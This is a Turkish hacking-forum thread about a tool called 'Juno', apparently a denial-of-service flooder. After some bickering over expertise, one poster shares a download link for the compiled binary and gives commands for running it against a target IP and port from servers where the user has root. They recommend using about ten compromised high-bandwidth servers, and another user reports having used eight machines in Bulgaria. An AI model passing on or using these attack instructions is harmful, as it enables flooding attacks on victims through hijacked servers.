Juno Exploit
-
aferim sana
exploitin ne oldugunu biliyorum ve bunun da bi exploit oldugunu biliyorum ama sen exploitin turlu turlu islevleri oldugunu bilmiyormusun ...
-----------------------------hocam vb, c#, php, asp, perl, piton, java, sql, oracle, acces, xna, hack, seo vs vs
bilseydim hele birde uzmanlık alanıma yazdıysam daha vs vs lerde koyduysam kusura bakmada bu siteye takılmam :D
-----------------------------bu sitede bunlari bilen cok var
-----------------------------neyse boşver hocam gereksiz
-
DJ_Alper bunu yazdı:
-----------------------------
geniuss bunu yazdı:
DJ_Alper bunu yazdı:
geniuss bunu yazdı:
bu ne ise yariyor
-----------------------------İlgi ve Uzmanlık Alanları
vb, c#, php, asp, perl, piton, java, sql, oracle, acces, xna, hack, seo vs vsve exploit in ne olduğunu bilmiyorsun? :|
-----------------------------aferim sana
exploitin ne oldugunu biliyorum ve bunun da bi exploit oldugunu biliyorum ama sen exploitin turlu turlu islevleri oldugunu bilmiyormusun ...
-----------------------------hocam vb, c#, php, asp, perl, piton, java, sql, oracle, acces, xna, hack, seo vs vs
bilseydim hele birde uzmanlık alanıma yazdıysam daha vs vs lerde koyduysam kusura bakmada bu siteye takılmam :D
-----------------------------adam haklı bi söz vardır büyük lokma ye ama büyük söz konuşma diye değişik varyasyonlarıda var gerçi bu lafın ama alper iyi yakalamış.
-
bunun derlenmiş halini root oldugun sunucudan koydunmu karşıdaki ebesininkini görüyor ama şöyle 10 tane root bulup çakman lazım
-
çalışma prensibini anlatabilecek olan var mı? yani ne yapıyorda karşıdaki ebesininkini görüyor?
-
Varmı farki ne diyerlerinden
-
http://rapidshare.com/files/449598507/juno.rar
derlenmiş hali yukarıdadır.
kullanımı
root erişim yetkisine sahip oldugunuz bir makineden girip
chmod 777 juno
./juno saldırıcanızip <port>
bu saldırının etkisini yükseltmek için bastınız sunucunun sağlam çıkışı olması lazım örnek almanyadaki makineler .
-
teşekkürler bulgaristanda 8 makina vardı elimde onları kullandım bir işte bunuda indireyim dursun